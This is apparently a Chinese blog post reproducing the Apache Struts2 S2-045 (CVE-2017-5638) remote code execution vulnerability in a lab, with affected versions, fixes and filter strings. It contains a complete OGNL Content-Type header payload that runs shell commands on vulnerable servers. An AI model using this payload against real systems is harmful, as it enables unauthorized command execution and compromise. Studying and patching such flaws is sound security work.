Struts2 __ S2-045 Remote Code Execution Vulnerablity __ CVE-2017-5638

于 2023-09-12 18:00:00 发布
阅读量102 收藏
点赞数
分类专栏: 漏洞复现 文章标签: struts
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132790876
版权
Struts2 __ S2-045 Remote Code Execution Vulnerablity __ CVE-2017-5638
说明内容
漏洞编号CVE-2017-5638
漏洞名称S2-045 Remote Code Execution Vulnerablity
影响范围Struts 2.3.5 - Struts 2.3.31,
Struts 2.5 - Struts 2.5.10
漏洞描述pache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,
攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
修复方案一、修复方式: 升级Apache Struts版本至 2.3.32 or 2.5.10.1以上。

二、修复建议:在网络防护设备上配置过滤包含如下:

#nike=‘multipart/form-data’

以及

#container=#context[‘com.opensymphony.xwork2.ActionContext.container’

1.漏洞描述

Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。

2.影响版本

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

3.漏洞复现

3.1基础环境

访问`http://10.9.75.198:8080`即可看到上传页面

在这里插入图片描述

3.2漏洞复现

使用burp抓包取数据包,然后Content-Type:更改为

Content-Type:
方法一
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
方法二
"%{(#xxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"pwd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

在这里插入图片描述

成功显示

4.漏洞修复

一、修复方式: 升级Apache Struts版本至 2.3.32 or 2.5.10.1以上。

二、修复建议:在网络防护设备上配置过滤包含如下:

#nike='multipart/form-data'

以及

#container=#context['com.opensymphony.xwork2.ActionContext.container'

字段串(及相关字符转义形式)的URL请求。

cgjil
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
K8_Struts2_EXP S2-045.rar
02-22
K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit) Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell 目前已支持以下struts2漏洞编号 (S2-032 s2-020 ...
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 6920
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
S2-045漏洞复现
不曾扬帆,何以至远方
07-14 1649
S2-045(CVE-2017-5638)漏洞复现
s2-045远程代码执行漏洞复现(工具打)
weixin_50495345的博客
04-11 387
这篇文章只写漏洞复现过程,需要详解漏洞原理的小伙伴请自行查找喔。使用ubuntu(192.168.8.135)下docker搭建vulhub漏洞环境使用steuts2全系列漏洞检测工具对漏洞进行检测和复现(工具可以自行去github.com下载)
Apache Struts2 S2-045远程命令执行漏洞(CVE-2017-5638)复现
qq_40640917的博客
02-23 2095
Apache Struts2Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
BPEL.ppt.rar_BPEL_BPEL P_WS-BPEL p_business process_execution
09-24
BPEL:全称为Business Process Execution Language,即业务流程执行语言,是一种使用XML编写的编程语言。用于自动化业务流程,也曾经被称作WSBPEL和 BPEL4WS。广泛使用于Web服务相关的项目开发中,优点为具有可移植性...
Exploit-Nagios-XI-5.7.X_Remote-Code-Execution-RCE-Authenticated:Nagios XI 5.7.X-远程执行代码RCE(已认证)
04-10
利用Nagios-XI-5.7.X远程代码执行RCE身份验证 Nagios XI 5.7.X-远程执行代码RCE(已认证)
Detecting-Windows-NT_2K-process-execution.pdf.zip_execution
09-19
This is good project on Detecting Windows NT/2K process execution.
s2-045批量验证
03-09
s2-044批量验证(看代码放入url文件)
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
S2-045 Struts 2漏洞(CVE-2017-5638) 实战
shylcok的博客
08-11 780
公司接到阿里云需要升级Struts 2的邮件,因为 我们公司用的 Struts 2版本 有远程代码执行漏洞。但是 如果执行一些和文件,目录相关的操作 就会提示: 没有那个文件或目录。1.抓包,使用bp或者Charles都行 (我这使用Charles)现在可以执行查看路径等一些权限,但是还做不到删除,新增等一些操作。重要的是,下图中 Content-Type的内容 进行修改。2.改包(1.打断点2.repeat一下3修改需要修改的)当中的重点就是加粗字体:(#cmd='"ls"')......
S2-045远程代码执行
最新发布
Tender*的博客
08-10 133
使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用 户 可在上传文件时通过修改 HTTP请求头中的值来触发该漏洞,进而执行系统命令。环境搭建进入拉取环境。
s2-045漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
Struts2-045 Remote Code Execution VulnerablityCVE-2017-5638)复现
薛定谔嘚喵博客
05-30 160
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
struts2漏洞s2-045漏洞利用测试
feinifi的博客
02-20 6335
s2-045漏洞是一个可以执行远程命令的漏洞,该漏洞是struts2上传文件使用参数struts.multipart.parser=jakarta,并且文件上传采用了commons-fileupload的api导致的。只是使用struts.multipart.parser=jakarta并不能导致这个问题,需要在请求时,请求头使用Content-Type参数,这个参数必须带上一串奇怪的ognl表达...
S2-045 远程代码执行漏洞(CVE-2017-5638
Stephen Wolf
11-04 8039
一、S2-045 远程代码执行漏洞(CVE-2017-5638) 简述: Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大...
nmap实现 自动发现web漏洞的思路
weixin_34362875的博客
05-31 709
2019独角兽企业重金招聘Python工程师标准>>> ...
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
05-31
要验证是否存在Apache Log4j2远程代码执行漏洞(CVE-2021-44228),可以使用以下步骤: 1. 确认您的应用程序中是否使用了Apache Log4j2。检查您的应用程序的依赖库和配置文件。 2. 确认您的应用程序是否使用了Log4j2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值